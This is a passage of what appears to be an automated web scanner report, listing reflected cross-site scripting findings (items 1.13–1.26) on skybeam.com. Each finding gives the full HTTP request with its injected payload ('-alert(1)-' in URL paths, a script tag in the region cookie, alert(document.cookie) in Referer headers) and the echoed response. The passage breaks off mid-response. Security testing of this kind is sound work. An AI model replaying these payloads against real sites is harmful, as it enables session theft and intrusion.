1.13. http://skybeam.com/residential.php/images/referral-icon.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/referral-icon.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5ebd'-alert(1)-'80ff39427ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/referral-icon.jpgb5ebd'-alert(1)-'80ff39427ea HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('referral-icon.jpgb5ebd'-alert(1)-'80ff39427ea');</script>
...[SNIP]...

1.14. http://skybeam.com/residential.php/images/shadowRight.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/shadowRight.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e899'-alert(1)-'693ddcda9ed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/images/shadowRight.gif3e899'-alert(1)-'693ddcda9ed HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Length: 14489
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('shadowRight.gif3e899'-alert(1)-'693ddcda9ed');</script>
...[SNIP]...

1.15. http://skybeam.com/residential.php/site-tx/images/call-for-best-offer.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/site-tx/images/call-for-best-offer.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cab1a'-alert(1)-'c75bccaab7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/site-tx/images/call-for-best-offer.gifcab1a'-alert(1)-'c75bccaab7 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14496


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('call-for-best-offer.gifcab1a'-alert(1)-'c75bccaab7');</script>
...[SNIP]...

1.16. http://skybeam.com/residential.php/site-tx/images/res-bundle.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/site-tx/images/res-bundle.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21beb'-alert(1)-'42908069497 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/site-tx/images/res-bundle.jpg21beb'-alert(1)-'42908069497 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14488


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('res-bundle.jpg21beb'-alert(1)-'42908069497');</script>
...[SNIP]...

1.17. http://skybeam.com/residential.php/site-tx/images/res-internet.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/site-tx/images/res-internet.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 432ee'-alert(1)-'fce1798839b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/site-tx/images/res-internet.jpg432ee'-alert(1)-'fce1798839b HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('res-internet.jpg432ee'-alert(1)-'fce1798839b');</script>
...[SNIP]...

1.18. http://skybeam.com/residential.php/site-tx/images/res-phone.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/site-tx/images/res-phone.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cf1c'-alert(1)-'63070671c7c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /residential.php/site-tx/images/res-phone.jpg8cf1c'-alert(1)-'63070671c7c HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('res-phone.jpg8cf1c'-alert(1)-'63070671c7c');</script>
...[SNIP]...

1.19. http://skybeam.com/support.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skybeam.com
Path:   /support.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f36a'-alert(1)-'635ce03d9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support.php/2f36a'-alert(1)-'635ce03d9c HTTP/1.1
Host: skybeam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: region=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); state=tx; __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; __utmc=84641179; __utmb=84641179.1.10.1290618259;

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 16:32:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 12125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<script type="text/javascript">subNavShow('2f36a'-alert(1)-'635ce03d9c');</script>
...[SNIP]...

1.20. http://skybeam.com/residential.php [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75cfd"><script>alert(1)</script>8f04697dd67 was submitted in the region cookie. This input was echoed as 75cfd\"><script>alert(1)</script>8f04697dd67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx75cfd"><script>alert(1)</script>8f04697dd67; state=tx; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; __utmc=84641179; __utmb=84641179.1.10.1290618259

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 16:30:03 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13232


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TX75CFD\"><SCRIPT>ALERT(1)</SCRIPT>8F04697DD67" />
...[SNIP]...

1.21. http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0 [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/f768e'-alert(document.cookie)-'9beabf74cd0

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e1ad"><script>alert(1)</script>063b831515 was submitted in the region cookie. This input was echoed as 1e1ad\"><script>alert(1)</script>063b831515 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/f768e'-alert(document.cookie)-'9beabf74cd0 HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx1e1ad"><script>alert(1)</script>063b831515; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TX1E1AD\"><SCRIPT>ALERT(1)</SCRIPT>063B831515" />
...[SNIP]...

1.22. http://skybeam.com/residential.php/images/favicon.ico [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/favicon.ico

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c90"><script>alert(1)</script>73088c15f12 was submitted in the region cookie. This input was echoed as e1c90\"><script>alert(1)</script>73088c15f12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/favicon.ico HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=txe1c90"><script>alert(1)</script>73088c15f12; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TXE1C90\"><SCRIPT>ALERT(1)</SCRIPT>73088C15F12" />
...[SNIP]...

1.23. http://skybeam.com/residential.php/images/hdr_no_contracts.gif [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/hdr_no_contracts.gif

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63fd9"><script>alert(1)</script>df41a947c90 was submitted in the region cookie. This input was echoed as 63fd9\"><script>alert(1)</script>df41a947c90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/hdr_no_contracts.gif HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx63fd9"><script>alert(1)</script>df41a947c90; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TX63FD9\"><SCRIPT>ALERT(1)</SCRIPT>DF41A947C90" />
...[SNIP]...

1.24. http://skybeam.com/residential.php/images/hdr_referral_prog.gif [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/hdr_referral_prog.gif

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2557d"><script>alert(1)</script>4a90a14266c was submitted in the region cookie. This input was echoed as 2557d\"><script>alert(1)</script>4a90a14266c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/hdr_referral_prog.gif HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx2557d"><script>alert(1)</script>4a90a14266c; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 13238


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TX2557D\"><SCRIPT>ALERT(1)</SCRIPT>4A90A14266C" />
...[SNIP]...

1.25. http://skybeam.com/residential.php/images/logo.png [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/logo.png

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9961"><script>alert(1)</script>f5504ef1c06 was submitted in the region cookie. This input was echoed as b9961\"><script>alert(1)</script>f5504ef1c06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/logo.png HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=txb9961"><script>alert(1)</script>f5504ef1c06; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Content-Length: 13225
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Co
...[SNIP]...
<input type="text" name="state" id="state" size="2" maxlength="2" value="TXB9961\"><SCRIPT>ALERT(1)</SCRIPT>F5504EF1C06" />
...[SNIP]...

1.26. http://skybeam.com/residential.php/images/nav_business.png [region cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skybeam.com
Path:   /residential.php/images/nav_business.png

Issue detail

The value of the region cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e05e"><script>alert(1)</script>c123bf659fc was submitted in the region cookie. This input was echoed as 3e05e\"><script>alert(1)</script>c123bf659fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential.php/images/nav_business.png HTTP/1.1
Host: skybeam.com
Proxy-Connection: keep-alive
Referer: http://skybeam.com/residential.php/f768e'-alert(document.cookie)-'9beabf74cd0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: region=tx3e05e"><script>alert(1)</script>c123bf659fc; __utmz=84641179.1290618259.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84641179.1602404749.1290618259.1290618259.1290618259.1; state=tx

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 23:00:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
